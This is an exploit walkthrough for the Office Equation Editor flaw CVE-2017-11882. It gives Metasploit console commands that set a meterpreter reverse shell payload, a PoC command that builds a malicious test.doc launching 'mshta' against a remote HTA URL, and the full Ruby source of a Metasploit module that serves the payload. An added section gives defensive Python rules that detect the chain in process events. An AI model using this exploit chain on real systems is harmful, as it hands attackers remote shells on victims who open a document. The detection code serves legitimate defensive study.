Vulnerability analysis
POC

Use the module in msf to generate the HTA file

msf > use exploit/windows/office/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > show options

Module options (exploit/windows/office/CVE-2017-11882):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Automatic


Here you can set the URI path that the module serves

msf exploit(CVE-2017-11882) > set URIPATH 1

Set the callback IP and port

msf exploit(CVE-2017-11882) > set LHOST x.x.x.x
msf exploit(CVE-2017-11882) > set LPORT 4455 

Run exploit

msf exploit(CVE-2017-11882) > exploit
[*] Exploit running as background job 0.

[-] Handler failed to bind to 192.168.1.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:8080/1
[*] Local IP: http://192.168.114.128:8080/1
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.1:8080/1"

If a victim downloads the file from the URL, a notice is shown in the console

The generated file can also be hosted on an external VPS, and the callback shell can be caught by listening on the machine whose IP was set

Next, use the POC to generate the doc file

┌─[parrot@parrot]─[~/Desktop/CVE-2017-11882]
└──╼ $python '/home/aresx/Desktop/CVE-2017-11882/Command_CVE-2017-11882.py' -c "mshta http://192.168.114.128:8080/1" -o 'test.doc'
[*] Done ! output file >> test.doc <<

When the victim opens the doc file, the listening machine receives a session
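The same chain seen from the defender's side, added here as an example that is not part of the original post or of the Metasploit module: two simple detections run over constructed process-creation events in a Sysmon-style layout (all paths and values are made up). CVE-2017-11882 is a flaw in the Office Equation Editor (EQNEDT32.EXE), so any child process of that binary, and mshta.exe fetching a remote URL, are the signals worth alerting on.

```python
import re

# Constructed process-creation events in a simplified Sysmon Event ID 1 layout.
# These are made-up sample values, not real telemetry.
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" test.doc'},
    # Equation Editor is started out-of-process by DCOM, so its parent is svchost.
    {"Image": EQNEDT, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": '"EQNEDT32.EXE" -Embedding'},
    # The command embedded by the PoC: Equation Editor launches mshta with the URL.
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EQNEDT,
     "CommandLine": "mshta http://192.168.114.128:8080/1"},
    # Benign local HTA run by the user: no remote URL, normal parent.
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\setup.hta"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the detections that fire for one event."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # EQNEDT32.EXE has no legitimate reason to spawn children; a child of the
    # Equation Editor is the hallmark of CVE-2017-11882 being triggered.
    if parent == "eqnedt32.exe":
        hits.append("eqnedt32_child_process")
    # mshta.exe pulling an HTA over HTTP is the delivery step the module's
    # primer prints: mshta.exe "http://host:port/path".
    if image == "mshta.exe" and re.search(r"https?://", cmd, re.IGNORECASE):
        hits.append("mshta_remote_url")
    return hits


def scan(events):
    """Keep only the events that fire at least one detection."""
    alerts = []
    for event in events:
        hits = classify(event)
        if hits:
            alerts.append({"image": basename(event["Image"]), "hits": hits})
    return alerts
```

Only the mshta.exe event spawned by EQNEDT32.EXE fires, and it fires both rules; the user-launched local HTA and the Equation Editor process itself stay quiet.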

Metasploit module CVE-2017-11882.rb

Source

Save it to the directory usr/share/metasploit-framework/modules/exploits/windows/office/

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # HttpServer supplies the built-in web server (SRVHOST/SRVPORT/URIPATH options),
  # calls on_request_uri for each request and primer once the server is up.
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates a command to place within
        a Word document that, when executed, will retrieve an HTA payload
        via HTTP from a web server. Currently have not figured out how
        to generate a doc.
      },
      'License'     => MSF_LICENSE,
      'Arch'        => ARCH_X86,
      'Platform'    => 'win',
      'Targets'     =>
        [
          ['Automatic', {}],
        ],
      'DefaultTarget' => 0,
    ))
  end

  # Called for every request to the served URI: wrap the selected payload in an
  # HTA that launches PowerShell ('hta-psh' format) and return it as application/hta.
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }  # the original listing had a stray space in 'win '
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Runs once the server has started: print the one-liner to embed in the document.
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end


2017-11-22